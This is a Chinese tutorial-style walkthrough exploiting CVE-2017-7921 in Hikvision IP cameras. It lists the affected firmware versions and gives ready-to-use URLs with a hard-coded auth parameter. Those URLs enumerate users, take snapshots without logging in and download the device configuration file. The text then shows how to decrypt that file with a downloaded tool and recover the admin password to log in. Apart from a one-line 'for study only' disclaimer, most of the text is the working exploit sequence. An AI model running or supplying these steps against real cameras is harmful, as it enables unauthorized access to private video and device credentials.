Hikvision海康威视摄像头CVE-2017-7921漏洞解析

注意—Hikvision海康威视摄像头CVE-2017-7921漏洞解析

此漏洞复现仅供学习参考,不涉及任何以破坏为目的的违法犯罪

漏洞影响版本

0x03 漏洞影响版本:

HikvisionDS-2CD2xx2F-ISeries5.2.0build140721

版本至5.4.0build160530版本;

DS-2CD2xx0F-ISeries5.2.0build140721

版本至5.4.0Build160401版本;

DS-2CD2xx2FWDSeries5.3.1build150410

版本至5.4.4Build161125版本;

DS-2CD4x2xFWDSeries5.2.0build140721

版本至5.4.0Build160414版本;

DS-2CD4xx5Series5.2.0build140721

版本至5.4.0Build160421版本;

DS-2DFxSeries5.2.0build140805

版本至5.4.5Build160928版本;

DS-2CD63xxSeries5.0.9build140305

版本至5.3.5Build160106版本

发现界面

Hikvision海康威视摄像头CVE-2017-7921漏洞解析_第1张图片

如图,如果想要登录则需要用户名和密码,但漏洞审查的时候发现这个海康威视有一个致命的漏洞CVE-2017-7921

漏洞利用

1.检索用户与用户列表

在web浏览器中输入以下代码来检索用户与用户列表

http://your-ip/Security/users?auth=YWRtaW46MTEK   

your-ip换成你要测试的ip地址

浏览器输入结果如下图所示

Hikvision海康威视摄像头CVE-2017-7921漏洞解析_第2张图片

从上图可知,这个摄像头有且只有一个用户名:admin

2.获取监控快照

在没有进行身份验证的情况下获取监控快照可以使用以下代码在浏览器中打开

http://your-ip/onvif-http/snapshot?auth=YWRtaW46MTEK  //your-ip需要换成需破解摄像头的ip

your-ip换成你要测试的ip地址

浏览器输入结果如下图所示
Hikvision海康威视摄像头CVE-2017-7921漏洞解析_第3张图片

3.下载摄像头配置账号密码文件

在没有验证的情况下需要使用如下代码来下载摄像头的配置文件

http://your-ip/System/configurationFile?auth=YWRtaW46MTEK  //your-ip需要换成要破解的ip

your-ip换成你要测试的ip地址

代码输入之后浏览器会自动下载一个名为configurationFile的文件,如下

Hikvision海康威视摄像头CVE-2017-7921漏洞解析_第4张图片

现在我们已经获取得到摄像头的配置文件

三:文件解密

1.配置文件解码

在上面我们已近得到了海康威视摄像头的配置文件了,但是配置文件是加密过的,我们没有办法从中直接得到密码。所以我们需要先将配置文件进行解密,这里我们需要用到一个专门的海康威视配置文件解密工具 下载地址 CSDN中下载 https://download.csdn.net/download/weixin_43343299/19788898

下载完成后,直接点开软件即可使用,界面如下
Hikvision海康威视摄像头CVE-2017-7921漏洞解析_第5张图片

点击下图所示按钮打开配置文件

Hikvision海康威视摄像头CVE-2017-7921漏洞解析_第6张图片

打开配置文件,会弹出一个弹框,问你打开的文件是加密文件还是解密文件,我们打开的是加密文件,按照如下所示打开就行

Hikvision海康威视摄像头CVE-2017-7921漏洞解析_第7张图片

按照如下图所示顺序解密文件并保存
Hikvision海康威视摄像头CVE-2017-7921漏洞解析_第8张图片

将得到的文件放到010editor里面,并使用ctrl+F 导出搜索框搜索admin

Hikvision海康威视摄像头CVE-2017-7921漏洞解析_第9张图片

四:登录验证

输入用户名密码,登录成功,说明破解是成功的

请添加图片描述

你可能感兴趣的:(渗透笔记,安全,web安全)